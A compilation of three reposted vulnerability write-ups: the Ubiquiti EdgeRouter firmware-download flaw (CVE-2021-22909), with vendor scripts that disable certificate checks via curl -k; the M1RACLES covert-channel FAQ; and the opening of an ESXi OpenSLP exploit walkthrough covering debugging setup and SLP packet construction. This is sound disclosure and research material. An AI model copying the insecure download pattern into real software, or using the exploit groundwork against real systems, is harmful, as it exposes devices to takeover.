CVE-2021-22909 - DIGGING INTO A UBIQUITI FIRMWARE UPDATE BUG

Original text by Vincent Lee

Back in February, Ubiquiti released a new firmware update for the Ubiquiti EdgeRouter, fixing CVE-2021-22909/ZDI-21-601. The vulnerability lies in the firmware update procedure and allows a man-in-the-middle (MiTM) attacker to execute code as root on the device by serving a malicious firmware image when the system performs an automatic firmware update. The vulnerability was discovered and reported to the ZDI program by the researcher known as awxylitol.

This vulnerability may sound contrived; a bad actor gives bad firmware to the device and bad things happen. However, insecure download vulnerabilities have been the backbone of multiple Pwn2Own winning entries in the router category since its inception. The impact of this vulnerability is quite nuanced and worthy of further discussion.

How exactly does the router perform a firmware update?

According to Ubiquiti documentation, the new templated operational command add system image can be used to update the firmware of the router through the command-line interface (CLI). A templated operational command allows the user to quickly modify the operational state of the router without fiddling with complex command-line parameters. This simplifies day-to-day operations and minimizes user errors. I am sure we have all heard horror stories of system administrators who accidentally deleted critical files or locked themselves out of equipment far from civilization. Templated commands attempt to mitigate these issues.

The templating system used by the Ubiquiti EdgeRouter is provided by the vyatta-op package. The command add system image is defined in the /opt/vyatta/share/vyatta-op/templates/add/system/image/node.def file.

$ cat node.def
help: Add a new image to the system
run: sudo /usr/sbin/ubnt-fw-latest --upgrade

By running this operational command, the user is effectively invoking the ubnt-fw-latest script with the --upgrade option. This option causes the ubnt-fw-latest script to run the upgrade_firmware() function, which will check with a Ubiquiti update server to get information about the latest firmware release, including the firmware download URLs.

#!/bin/bash
#-------------------------------------------------------------------------------
STATUS_FILE="/var/run/fw-latest-status"
UPGRADING_FILE="/var/run/upgrading"
REBOOT_NEEDED_FILE="/var/run/needsareboot"
DOWNLOADING_FILE="/var/run/downloading"
URL="https://fw-update.ubnt.com/api/firmware-latest"
ACTION="refresh"
CHANNEL="release"
DEFAULT_URL="https://localhost/eat/my/shorts.tar"
#-------------------------------------------------------------------------------
while [[ $# -gt 0 ]]
do
    key="$1"
    case $key in
        -r|--refresh)            # Refresh status of latest firmware by
            ACTION="refresh"     # fetching it from fw-update.ubnt.com
            shift
            ;;
        -s|--status)             # Read latest firmware status from cache
            ACTION="status"
            shift
            ;;
        -u|--upgrade)            # Upgrade to latest firmware
            ACTION="upgrade"
            shift
            ;;
        -c|--channel)            # Target channel (release or public-beta)
            CHANNEL="$2"
            shift
            shift
            ;;
        *)                       # Ignore unknown arguments
            shift
            ;;
    esac
done
# ...
upgrade_firmware() {
    # Fetch version number of latest firmware
    echo -n "Fetching version number of latest firmware... "
    refresh_status_file &> /dev/null
    # Parse status file
    local fw_version=`cat $STATUS_FILE | jq -r .version 2> /dev/null` || fw_version=""
    local fw_url=`cat $STATUS_FILE | jq -r .url 2> /dev/null` || fw_version=""
    local fw_md5=`cat $STATUS_FILE | jq -r .md5 2> /dev/null` || fw_version=""
    local fw_state=`cat $STATUS_FILE | jq -r .state 2> /dev/null` || fw_version=""
    if [ -z "$fw_version" ] || [ "$fw_url" = "$DEFAULT_URL" ]; then
        echo "failed"
        exit 42
    else
        echo "ok"
        echo " > version : $fw_version"
        echo " > url     : $fw_url"
        echo " > md5     : $fw_md5"
        echo " > state   : $fw_state"
        echo
    fi
    if [ "$fw_state" == "can-upgrade" ]; then
        echo "New firmware $fw_version is available"
        echo
        sudo /usr/bin/ubnt-upgrade --upgrade-force-prompt "$fw_url"
    elif [ "$fw_state" == "up-to-date" ]; then
        echo "Current firmware is already up-to-date (!!!)"
        echo
        sudo /usr/bin/ubnt-upgrade --upgrade-force-prompt "$fw_url"
    elif [ "$fw_state" == "reboot-needed" ]; then
        echo "Reboot is needed before upgrading to version $fw_version"
    else
        echo "Upgrade is already in progress"
    fi
}
#-------------------------------------------------------------------------------
if [ "$ACTION" == "refresh" ]; then
    refresh_status_file
elif [ "$ACTION" == "status" ]; then
    read_status_file
elif [ "$ACTION" == "upgrade" ]; then
    upgrade_firmware
fi

The function proceeds to parse and compare the results from the server with the current firmware version. If an update is available, the script will invoke ubnt-upgrade to fetch the firmware from the fw-download.ubnt.com domain provided by the upgrade server. It will then perform the actual firmware upgrade.

The Bug — ZDI-21-601

The issue lies in the way the /usr/bin/ubnt-upgrade bash script downloads the firmware. The get_tar_by_url() function uses the curl command to perform the fetch. However, the developers specified the -k option (also known as the --insecure option), which disables certificate verification for TLS connections.

get_tar_by_url ()
{
    mkdir $TMP_DIR
    if [ "$NOPROMPT" -eq 0 ]; then
        echo "Trying to get upgrade file from $TAR"
    fi
    if [ -n "$USERNAME" ]; then
        auth="-u $USERNAME:$PASSWORD"
    else
        auth=""
    fi
    filename="${TMP_DIR}/${TAR##*/}"
    if [ "$NOPROMPT" -eq 0 ]; then
        curl -k $auth -f -L -o $filename $TAR    # <------
    else
        curl -k $auth -f -s -L -o $filename $TAR # <------
    fi
    if [ $? -ne 0 ]; then
        echo "Unable to get upgrade file from $TAR"
        rm -f $filename
        rm -f $DOWNLOADING
        exit 1
    fi
    if [ ! -e $filename ]; then
        echo "Download of $TAR failed"
        rm -f $DOWNLOADING
        exit 1
    fi
    if [ "$NOPROMPT" -eq 0 ]; then
        echo "Download succeeded"
    fi
    TAR=$filename
}

Since /usr/bin/ubnt-upgrade does not check the validity of the certificate, an attacker can use a self-signed certificate to spoof the fw-download.ubnt.com domain without triggering any warnings or complaints on the device to alert the user. This vulnerability significantly lowers the skill barrier needed to launch a successful attack.
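As an illustration (not from the original write-up), Python’s ssl module makes the same trade-off explicit: disabling verification on an SSL context is the moral equivalent of curl’s -k flag.

```python
import ssl

# What curl does by default: require a certificate that chains to a
# trusted CA and matches the requested hostname.
secure = ssl.create_default_context()

# The moral equivalent of curl -k / --insecure: hostname checking off,
# certificate verification off, so any self-signed cert is accepted.
insecure = ssl.create_default_context()
insecure.check_hostname = False
insecure.verify_mode = ssl.CERT_NONE

assert secure.verify_mode == ssl.CERT_REQUIRED
assert insecure.verify_mode == ssl.CERT_NONE
```

Note that `check_hostname` must be cleared before `verify_mode` can be set to `CERT_NONE`; a connection made with the `insecure` context will accept any certificate, exactly like the vulnerable curl invocation.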

To exploit this vulnerability, the attacker can modify an existing EdgeRouter firmware image and fix up the checksum contained in the file. In the submitted proof-of-concept, the researcher modified the rc.local file to connect back to the attacker with a reverse shell. A reboot is part of the upgrade process, triggering the rc.local script.

Conclusion

If an attacker inserts themselves as a MiTM, they can impersonate the fw-download.ubnt.com domain controlled by Ubiquiti. However, to successfully serve malicious firmware from this domain, the attacker would normally need a valid certificate and its private key for the domain. That would mean hacking into Ubiquiti or convincing a trusted certificate authority (CA) to issue a certificate for the Ubiquiti domain, which is no small feat. Due to this bug, however, there is no need to obtain the certificate at all.

The heart of the problem is the lack of authentication on the firmware binary. The function of a secure communications channel is to provide confidentiality, integrity, and authentication. In TLS, encryption provides confidentiality, a message digest (or AEAD in the case of TLS 1.3) provides integrity, and certificate verification provides authentication. Without the verification of certificates, clients are foregoing authentication in the communications channel. In this scenario, it is possible for the client to be speaking to a malicious actor “securely”, as it were.

It should also be noted that checksums are not replacements for cryptographic signatures. Checksums can help detect random errors in transmission but do not provide proof of data authenticity.
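A small sketch of the difference, using Python’s hashlib and hmac with a hypothetical vendor key (an HMAC stands in here for a real asymmetric signature scheme):

```python
import hashlib
import hmac

firmware = b"original firmware image"
tampered = b"malicious firmware image"

def publish(data):
    # Whoever controls the download also controls the advertised checksum:
    # a MiTM that swaps the firmware simply recomputes the MD5 to match.
    return data, hashlib.md5(data).hexdigest()

blob, advertised_md5 = publish(tampered)
assert hashlib.md5(blob).hexdigest() == advertised_md5  # integrity check passes anyway

# A signature keyed on a secret the attacker does not hold cannot be forged.
vendor_key = b"vendor-signing-key"  # hypothetical; held only by the vendor
vendor_sig = hmac.new(vendor_key, firmware, hashlib.sha256).digest()
attacker_sig = hmac.new(b"attacker-guess", tampered, hashlib.sha256).digest()
assert not hmac.compare_digest(vendor_sig, attacker_sig)
```

The checksum check succeeds even on tampered data because anyone can recompute it; only the keyed construction ties the file to the party holding the key.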

One final consideration is the possibility that a vendor’s website could become compromised. In that case, the firmware along with its associated hash could both be replaced with malicious versions. This situation can be mitigated only by applying a cryptographic signature to the firmware file itself. Perhaps Ubiquiti will make the switch to signing their firmware binaries cryptographically, which would improve the overall security of its customers.

Ubiquiti addressed this bug in their v2.0.9-hotfix.1 security update by removing the -k (--insecure) flag from the curl invocations in the upgrade script.

This was the first submission to the program from awxylitol, and we hope to see more research from them in the future. Until then, you can find me on Twitter @TrendyTofu, and follow the team for the latest in exploit techniques and security patches.

Footnote

Cautious EdgeRouter users seeking advice on how to upgrade the device properly should avoid the automatic upgrade feature for this update. They may want to download the firmware file manually from a browser, verify the hashes of the firmware, and then perform a manual upgrade by uploading the firmware file to the device through the web interface.

M1ssing Register Access Controls Leak EL0 State

M1RACLES (CVE-2021-30747) is a covert channel vulnerability in the Apple Silicon “M1” chip.

Original text by marcan

Executive Summary

A flaw in the design of the Apple Silicon “M1” chip allows any two applications running under an OS to covertly exchange data between them, without using memory, sockets, files, or any other normal operating system features. This works between processes running as different users and under different privilege levels, creating a covert channel for surreptitious data exchange.

The vulnerability is baked into Apple Silicon chips, and cannot be fixed without a new silicon revision.

Demo video

Watch a video piped in real time through the covert channel!

Technical Details

The ARM system register encoded as s3_5_c15_c10_1 is accessible from EL0, and contains two implemented bits that can be read or written (bits 0 and 1). This is a per-cluster register that can be simultaneously accessed by all cores in a cluster. This makes it a two-bit covert channel that any arbitrary process can use to exchange data with another cooperating process. A demo app to access this register is available here.

A malicious pair of cooperating processes may build a robust channel out of this two-bit state, by using a clock-and-data protocol (e.g. one side writes 1x to send data, the other side writes 00 to request the next bit). This allows the processes to exchange an arbitrary amount of data, bound only by CPU overhead. CPU core affinity APIs can be used to ensure that both processes are scheduled on the same CPU core cluster. A PoC demonstrating this approach to achieve high-speed, robust data transfer is available here. This approach, without much optimization, can achieve transfer rates of over 1MB/s (less with data redundancy).
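The clock-and-data protocol can be sketched in a few lines of Python, with the per-cluster register simulated by a plain two-bit variable (the real channel, of course, lives in hardware and crosses process boundaries):

```python
class FakeRegister:
    """Stands in for s3_5_c15_c10_1; only bits 0 and 1 are implemented."""
    def __init__(self):
        self.value = 0

def receive_bit(reg):
    assert reg.value & 0b10, "clock bit not set; data not ready"
    bit = reg.value & 0b01      # data travels in bit 0
    reg.value = 0b00            # writing 00 requests the next bit
    return bit

def send_bits(reg, bits):
    received = []
    for bit in bits:
        assert reg.value == 0b00    # wait until the receiver has acked
        reg.value = 0b10 | bit      # write 1x: clock bit plus data bit
        received.append(receive_bit(reg))
    return received

reg = FakeRegister()
assert send_bits(reg, [1, 0, 1, 1, 0]) == [1, 0, 1, 1, 0]
```

In the real PoC the two sides are separate processes spinning on the hardware register; the 1x/00 handshake is what makes the channel robust against scheduling jitter.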

The original purpose of this register is unknown, but it is not believed to have been made accessible to EL0 intentionally, thus making this a silicon erratum.

FAQ

Who is affected?

All Apple M1 users, running any operating system on bare metal.

Am I affected?

Probably.

  • macOS users: At least versions 11.0 and onwards are affected.
  • Linux users: Versions 5.13 and onwards are affected.
  • OpenBSD users: Hi Mark!
  • AmigaOS users: Look, Apple bought PASemi but the AmigaOne X1000 CPU doesn’t count as Apple Silicon, sorry.
  • Newton OS users: I guess those are technically Apple Silicon but…
  • iOS users: See below

Are other Apple CPUs affected?

Maybe, but I don’t have an iPhone or a DTK to test it. Feel free to report back if you try it. The A14 has been confirmed as also affected, which is expected, as it is a close relative of the M1.

Are non-Apple CPUs affected?

No.

Are VMs affected?

No. Correctly implemented hypervisors should disable guest accesses to this register by default, and this feature works correctly on the M1, which mitigates the issue. Both Hypervisor.framework (on macOS) and KVM (on Linux) do this, and are not affected.

How can I protect myself?

The only mitigation available to users is to run your entire OS as a VM.

Does the mitigation have a performance impact?

Yes, running your entire OS as a VM has a performance impact.

That sounds bad.

Well, yeah. Don’t do that, it’d be silly.

Is there really no other way?

Mitigating this under macOS properly would require turning its entire VM hypervisor framework design on its head. We are not aware of any plans by Apple to do so at this time.

It’s a bit easier on Linux, but it still requires fairly intrusive changes due to the design of the M1, and comes at a performance cost for guest VMs. We’re not in a huge rush to do this. Sorry.

How was this bug found?

I was working on figuring out how the M1 CPU works in order to port Linux to it. I found something that I assumed was an Apple proprietary feature, but it turned out to be an Apple proprietary bug, one that they themselves also weren’t aware of.

How was this bug disclosed?

I e-mailed product-security@apple.com. They acknowledged the vulnerability and assigned it CVE-2021-30747. I published this disclosure 90 days after the initial disclosure to Apple.

Was this responsibly disclosed?

I tried, but I also talked about it on public IRC before I knew it was a bug and not a feature, so I couldn’t do much about that part. ¯\_(ツ)_/¯

Is the vulnerability fixed in future Apple Silicon chips?

We do not have information on Apple’s plans for silicon mitigations. An educated guess based on silicon design timelines would be that the flaw will likely affect the next generation of Apple Silicon after M1, but might be fixed in the subsequent one.

Can malware use this vulnerability to take over my computer?

No.

Can malware use this vulnerability to steal my private information?

No.

Can malware use this vulnerability to rickroll me?

Yes. I mean, it could also rickroll you without using it.

Can this be exploited from Javascript on a website?

No.

Can this be exploited from Java apps?

Wait, people still use Java?

Can this be exploited from Flash applets?

Please stop.

Can I catch BadBIOS from this vulnerability?

No.

Wait, is this even real?

It is.

So what’s the real danger?

If you already have malware on your computer, that malware can communicate with other malware on your computer in an unexpected way.

Chances are it could communicate in plenty of expected ways anyway.

That doesn’t sound too bad.

Honestly, I would expect advertising companies to try to abuse this kind of thing for cross-app tracking, more than criminals. Apple could catch them if they tried, though, for App Store apps (see below).

Wait. Oh no. Some game developer somewhere is going to try to use this as a synchronization primitive, aren’t they. Please don’t. The world has enough cursed code already. Don’t do it. Stop it. Noooooooooooooooo

What about iOS?

iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.

However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.
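As a rough sketch of how such static detection could work (this scanner is hypothetical, not Apple’s): AArch64 system-register access instructions have fixed encodings, so a tool only needs to search a binary for MRS/MSR words naming the offending register. The encoding formula below follows the ARMv8 architecture manual, sanity-checked against the well-known CNTVCT_EL0 register.

```python
import struct

def mrs_encoding(op0, op1, crn, crm, op2, rt=0):
    """Instruction word for AArch64 MRS Xt, S<op0>_<op1>_C<CRn>_C<CRm>_<op2>."""
    return (0xD5300000 | ((op0 & 1) << 19) | (op1 << 16)
            | (crn << 12) | (crm << 8) | (op2 << 5) | rt)

# Sanity check: MRS X0, CNTVCT_EL0 (S3_3_C14_C0_2) assembles to 0xD53BE040.
assert mrs_encoding(3, 3, 14, 0, 2) == 0xD53BE040

# The M1RACLES register, S3_5_C15_C10_1:
NEEDLE = mrs_encoding(3, 5, 15, 10, 1)

def reads_register(code: bytes) -> bool:
    """Scan little-endian AArch64 code for an MRS of the needle register,
    ignoring the destination register field (low 5 bits)."""
    n = len(code) // 4
    words = struct.unpack("<%dI" % n, code[:n * 4])
    return any((w & ~0x1F) == (NEEDLE & ~0x1F) for w in words)

assert reads_register(struct.pack("<I", NEEDLE | 3))   # MRS X3, S3_5_C15_C10_1
assert not reads_register(b"\x1f\x20\x03\xd5")         # NOP does not match
```

Since App Store binaries cannot JIT new code, every such instruction is visible in the submitted binary, which is why static scanning is reliable in this setting.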

What about APTs?

They have better exploits anyway. They don’t care.

So you’re telling me I shouldn’t worry?

Yes.

What, really?

Really, nobody’s going to actually find a nefarious use for this flaw in practical circumstances. Besides, there are already a million side channels you can use for cooperative cross-process communication (e.g. cache stuff), on every system. Covert channels can’t leak data from uncooperative apps or systems.

Actually, that one’s worth repeating: Covert channels are completely useless unless your system is already compromised.

So how is this a vulnerability if you can’t exploit it?

It violates the OS security model. You’re not supposed to be able to send data from one process to another secretly. And even if harmless in this case, you’re not supposed to be able to write to random CPU system registers from userspace either.

It was fairly lucky that the bug can be mitigated in VMs (as the register still responds to VM-related access controls); had this not been the case, the impact would have been more severe.

How did this happen anyway?

Someone in Apple’s silicon design team made a boo-boo. It happens. Engineers are human.

But Bloomberg says China hacked TSMC and put this in?!

Good time to buy TSMC stock then!*

* This site is for informational purposes only and is not intended to be a solicitation, offering or recommendation of any security, commodity, derivative, investment management service or advisory service and is not commodity trading advice. This site does not intend to provide investment, tax or legal advice on either a general basis or specific to any client accounts or portfolios. This website does not represent that the securities, products, or services discussed on this site are suitable or appropriate for any or all investors.

Wait, didn’t you say on Twitter that this could be mitigated really easily?

Yeah, but originally I thought the register was per-core. If it were, then you could just wipe it on context switches. But since it’s per-cluster, sadly, we’re kind of screwed, since you can do cross-core communication without going into the kernel. Other than running in EL1/0 with TGE=0 (i.e. inside a VM guest), there’s no known way to block it.

Can’t the OS just write garbage to the register to break apps using it?

No. It would have to do it so fast that it would peg a CPU core continuously, and you’d still get data through even with such noise. Lowering the signal-to-noise ratio almost never works for covert channels, and this case is particularly futile due to its high bandwidth.

Aren’t bugs like this rare and critical?

No, all CPUs have silly errata like this, you just don’t hear about them most of the time. Some vendors even occasionally hide some of these errata and don’t disclose them properly, because it makes them look bad. I hear some of them rhyme with “doorbell”.

But I’ve only heard about Spectre and Meltdown and…?

Because those are the ones that the discoverers chose to hype up. To be fair, those were kind of bad.

So what’s the point of this website?

Poking fun at how ridiculous infosec clickbait vulnerability reporting has become lately. Just because it has a flashy website or it makes the news doesn’t mean you need to care.

If you’ve read all the way to here, congratulations! You’re one of the rare people who doesn’t just retweet based on the page title 🙂

But how are journalists supposed to know which bugs are bad and which bugs aren’t?

Talk to people. In particular, talk to people other than the people who discovered the bug. The latter may or may not be honest about the real impact.

If you hear the words “covert channel”… it’s probably overhyped. Most of these come from paper mills who are endlessly recycling the same concept with approximately zero practical security impact. The titles are usually clickbait, and sometimes downright deceptive.

I came here from a news site and they didn’t tell me any of this at all!

Then perhaps you should stop reading that news site, just like they stopped reading this site after the first 2 paragraphs.

Are all news sites bad?

Nah, a few actually contacted me before running stories and got the facts and did a good job.

If this bug doesn’t matter, why did you go through all the trouble of putting this site and the demo together?

Honestly, I just wanted to play Bad Apple!! over an M1 vulnerability. You have to admit that’s kind of cool.

Can you go into more details about the possible mitigations and why you can’t just fix this in, like, 5 lines of code?

Sure. ARMv8 was originally designed to support Type 1 hypervisors. That’s like Xen for you x86 people: a small hypervisor (EL2) runs both the “host” OS and the “guest” OSes under it (EL1). Later, it was extended to support Type 2 hypervisors (“Virtualization Host Extensions”). That’s like KVM for you x86 people: the hypervisor is the host OS and both run at EL2.

Mitigating the problem requires running your OS at EL1, where the problem register can be disabled, and then having at least some kind of minimal hypervisor at EL2 to deal with those traps (otherwise running an app that uses the register would just crash your machine instead).

The macOS virtualization framework only supports running as a Type 2 hypervisor. So, to fix this, they’d have to re-design the entire thing to work as a Type 1 hypervisor.

Linux supports both modes, where KVM on ARMv8 can run as a little Type 1 hypervisor built into the OS, or as a Type 2 hypervisor like on x86. Running in Type 1 mode (“non-VHE”) would make mitigating the vulnerability possible. However, in their infinite wisdom, Apple decided to only support Type 2 (VHE) mode on Apple Silicon chips, in violation of the ARM architecture specification which requires Type 1 support (non-VHE). So you can’t actually run Linux in Type 1 mode on Apple Silicon. In fact, we had to patch Linux to work around this violation of the spec, because on every other ARM chip, it’ll always start in non-VHE mode and only switch to VHE mode later.

Nothing actually stops you from making a Type 1 hypervisor work in VHE mode (VHE mode adds features required to run as Type 2, but doesn’t remove anything), so it is possible to do Type 1 virtualization on Apple Silicon and work around this. However, because VHE mode changes the way virtualization works, Type 1 hypervisors meant to work in non-VHE mode won’t work in VHE mode without changes. So Linux would need a bunch of rework of its non-VHE Type 1 code to make it possible to use in VHE mode, where it was never intended to work because the ARM specification requires non-VHE mode to always be available.

Basically, Apple decided to break the ARM spec by removing a mandatory feature, because they figured they’d never need to use that feature for macOS. And then it turned out that removing that feature made it much harder for existing OSes to mitigate this vulnerability. Yay.

If you want to play around with this, you should know that setting the Apple-proprietary register bit HACR_EL2[48] to 1 will make accesses to the problem register (and a few others) trap to EL2, but only when running in VHE guest mode (with HCR_EL2.TGE = 0). They won’t trap in EL2/EL0 (VHE host) mode.

Who are you, anyway?

Hi!

Any closing thoughts?

If you want to help me work on porting and upstreaming Linux for Apple Silicon, I have a Patreon and a GitHub Sponsors. I promise most of the time I’m working on Linux, not writing silly vulnerability PoCs! 🙂

Follow our Linux port progress at asahilinux.org! If you enjoyed the technical part of this PoC, you will probably enjoy our first progress report.

Oh yeah, this vulnerability was found using m1n1. It’s cool, you should check it out! I’m also turning it into a minimal hypervisor to investigate macOS’s usage of the M1 hardware… but thanks to this bug being mitigated by VMs, that will also turn m1n1 into a (somewhat) practical mitigation for this bug, without the overhead of a “full” VM. You lose virtualization features in the guest OS, though, as the M1 does not support nested virtualization.

My RCE PoC walkthrough for (CVE-2021-21974) VMware ESXi OpenSLP heap-overflow vulnerability

Original text by Johnny Yu (@straight_blast)

During a recent engagement, I discovered a machine running VMware ESXi 6.7.0. Upon inspecting the known vulnerabilities associated with this version of the software, I identified that it may be vulnerable to the ESXi OpenSLP heap overflow (CVE-2021-21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, the security researcher who found this bug. Lucas wrote a brief overview of how to exploit the vulnerability but shared no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage fellow readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the finder’s perspective.

Setup

To set up a test environment, I need a vulnerable copy of VMware ESXi for testing and debugging. VMware offers a trial version of ESXi for download. Setup is straightforward: deploy the image through VMware Fusion or a similar tool. Once installation is complete, I used the web interface to enable SSH. To debug the ‘slpd’ binary on the server, I used the gdbserver that comes with the image. To talk to the gdbserver, I used SSH local port forwarding:

ssh -p 22 -L 1337:localhost:1337 root@<esxi-ip-address>

On the ESXi server, I attached gdbserver to ‘slpd’ as follow:

/etc/init.d/slpd restart ; sleep 1 ; gdbserver --attach localhost:1337 `ps | grep slpd | awk '{print $1}'`

Lastly, on my local gdb client, I connected to the gdbserver with the following command:

target remote localhost:1337

Service Location Protocol

The Service Location Protocol is a service discovery protocol that allows connecting devices to identify services available within the local area network by querying a directory server. This is similar to a person walking into a shopping center and looking at the directory listing to see what stores are in the mall. To keep this brief: a device can query a service and its location by making a ‘service request’ and specifying the type of service it wants to look up with a URL.

For example, to look up the VMInfrastructure service from the directory server, the device will make a request with ‘service:VMwareInfrastructure’ as the URL. The server will respond back with something like ‘service:VMwareInfrastructure://localhost.localdomain’.

A device can also collect additional attributes and metadata about a service by making an ‘attribute request’ with the same URL. Devices that want to be added to the directory can submit a ‘service registration’. This request includes information such as the IP of the device making the announcement, the type of service, and any metadata it wants to share. There are more message types in SLP, but the last one I am interested in is the ‘directory agent advertisement’, because that is where the vulnerability lies. The ‘directory agent advertisement’ is a broadcast message sent by the server to let devices on the network know whom to reach out to if they want to query about a service and its location. To learn more about SLP, please see this and that.

SLP Packet Structure

While the layout of the SLP structure will be slightly different between different SLP message types, they generally follow a header + body format.

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = SrvRqst = 1)        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      length of <PRList>       |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <service-type>    |    <service-type> String      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |     <scope-list> String       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of predicate string   |  Service Request <predicate>  \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <SLP SPI> string   |       <SLP SPI> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.1)

[SLP Client-1] connect

Header:  bytearray(b'\x02\x01\x00\x00=\x00\x00\x00\x00\x00\x00\x05\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of <PRList>:  0x0000
<PRList> String:  b''
length of <service-type>:  0x001c
<service-type> string:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of predicate string:  0x0000
Service Request <predicate>:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> String:  b''

[SLP Client-1] service request
[SLP Client-1] recv:  b'\x02\x02\x00\x00N\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x00\x00\x00\x01\x00\xff\xff\x004service:VMwareInfrastructure://localhost.localdomain\x00'
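The request above can be reproduced with a short Python builder; the header layout (version, function, 3-byte length, flags, extension offset, XID, language tag) follows RFC 2608. This is a minimal sketch, not the full PoC:

```python
import struct

def slp_string(s: bytes) -> bytes:
    # SLP strings are a 2-byte big-endian length followed by the bytes.
    return struct.pack(">H", len(s)) + s

def slp_header(function: int, body_len: int, xid: int, lang: bytes = b"en") -> bytes:
    total = 14 + len(lang) + body_len        # length field counts the whole packet
    return (struct.pack(">BB", 2, function)  # SLPv2, function ID (SrvRqst = 1)
            + total.to_bytes(3, "big")       # 3-byte packet length
            + b"\x00\x00"                    # flags
            + b"\x00\x00\x00"                # next-extension offset
            + struct.pack(">H", xid)         # transaction ID
            + slp_string(lang))              # language tag

def service_request(service_type: bytes, scope: bytes, xid: int) -> bytes:
    body = (slp_string(b"")             # <PRList>
            + slp_string(service_type)  # <service-type>
            + slp_string(scope)         # <scope-list>
            + slp_string(b"")           # predicate
            + slp_string(b""))          # <SLP SPI>
    return slp_header(1, len(body), xid) + body

pkt = service_request(b"service:VMwareInfrastructure", b"DEFAULT", xid=5)
assert pkt.startswith(b"\x02\x01\x00\x00=")  # version 2, SrvRqst, length 0x3d
```

With xid=5 this reproduces the exact header and body bytes shown above; swapping the function ID and body fields gives the other message types.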

An ‘attribute request’ packet looks like

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       Service Location header (function = AttrRqst = 6)       |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       length of PRList        |        <PRList> String        \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |         length of URL         |              URL              \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |    length of <scope-list>     |      <scope-list> string      \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |  length of <tag-list> string  |       <tag-list> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   length of <SLP SPI> string  |        <SLP SPI> string       \
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-10.3)
  
[SLP Client-1] connect
 
Header:  bytearray(b'\x02\x06\x00\x00=\x00\x00\x00\x00\x00\x00\x0c\x00\x02en')
Body:  bytearray(b'\x00\x00\x00\x1cservice:VMwareInfrastructure\x00\x07DEFAULT\x00\x00\x00\x00')

length of PRList:  0x0000
<PRList> String:  b''
length of URL:  0x001c
URL:  b'service:VMwareInfrastructure'
length of <scope-list>:  0x0007
<scope-list> string:  b'DEFAULT'
length of <tag-list> string:  0x0000
<tag-list> string:  b''
length of <SLP SPI> string:  0x0000
<SLP SPI> string:  b''

[SLP Client-1] attribute request
[SLP Client-1] recv:  b'\x02\x07\x00\x00w\x00\x00\x00\x00\x00\x00\x0c\x00\x02en\x00\x00\x00b(product="VMware ESXi 6.7.0 build-14320388"),(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")\x00' 
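The attribute reply carries a flat list of (tag="value") pairs. A minimal parser for the simple case shown above (no nested parentheses or escapes, which the full grammar allows) might look like:

```python
import re

def parse_attr_list(attrs: str) -> dict:
    # Each attribute is (tag="value"); assumes values contain no nested
    # parentheses or escaped quotes, as in the reply shown above.
    return dict(re.findall(r'\(([^=]+)="([^"]*)"\)', attrs))

info = parse_attr_list('(product="VMware ESXi 6.7.0 build-14320388"),'
                       '(hardwareUuid="23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9")')
assert info["product"] == "VMware ESXi 6.7.0 build-14320388"
```

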